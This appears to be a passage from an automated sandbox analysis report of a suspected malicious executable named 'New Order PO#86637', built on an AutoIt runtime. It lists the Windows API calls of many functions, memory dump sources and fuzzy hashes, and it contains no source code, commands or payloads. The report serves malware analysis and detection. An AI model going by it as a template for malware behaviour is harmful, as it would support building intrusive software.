                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                            • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                            • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                            • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 00444633
                                                                            • GetKeyboardState.USER32(?), ref: 00444648
                                                                            • SetKeyboardState.USER32(?), ref: 0044469C
                                                                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                            • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                            • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                            • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf__wcsicoll_wcscpy
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                            • API String ID: 1729044348-3025626884
                                                                            • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                            • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                                            • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                            • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                            • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                            • String ID:
                                                                            • API String ID: 2354583917-0
                                                                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                            • String ID:
                                                                            • API String ID: 896007046-0
                                                                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                            • GetFocus.USER32 ref: 00448ACF
                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                                            • String ID:
                                                                            • API String ID: 3429747543-0
                                                                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                            APIs
                                                                              • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                              • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                              • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                            • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 3300667738-0
                                                                            • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                            • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                            • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                            • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                            • __swprintf.LIBCMT ref: 0045D4E9
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu$\VH
                                                                            • API String ID: 3164766367-2432546070
                                                                            • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                            • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                            • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                            • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 3850602802-3636473452
                                                                            • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                            • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                            • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                            • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                                                            • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                                                            • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                                                            • __wsplitpath.LIBCMT ref: 00433E6D
                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                            • _wcscat.LIBCMT ref: 00433E80
                                                                            • __wcsicoll.LIBCMT ref: 00433E90
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                            • String ID:
                                                                            • API String ID: 135935984-0
                                                                            • Opcode ID: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
                                                                            • Instruction ID: 66738fc5919b7c3a3c7c4a311c48fd84e22d6c2a66b6279363cc5d51ef299119
                                                                            • Opcode Fuzzy Hash: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
                                                                            • Instruction Fuzzy Hash: 832180B6500118AFDB11CF90CD85EEEB379EB8C700F10459AFA0997150DA75AA85CBA4
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 0041F707
                                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                            • _free.LIBCMT ref: 0041F71A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free_malloc
                                                                            • String ID: [B
                                                                            • API String ID: 1020059152-632041663
                                                                            • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                            • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                            • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                            • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                            • __calloc_crt.LIBCMT ref: 00413DB0
                                                                            • __getptd.LIBCMT ref: 00413DBD
                                                                            • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                            • _free.LIBCMT ref: 00413E07
                                                                            • __dosmaperr.LIBCMT ref: 00413E12
                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                            • String ID:
                                                                            • API String ID: 155776804-0
                                                                            • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                            • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                            • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                            • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                            APIs
                                                                              • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                              • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                            • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                            • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
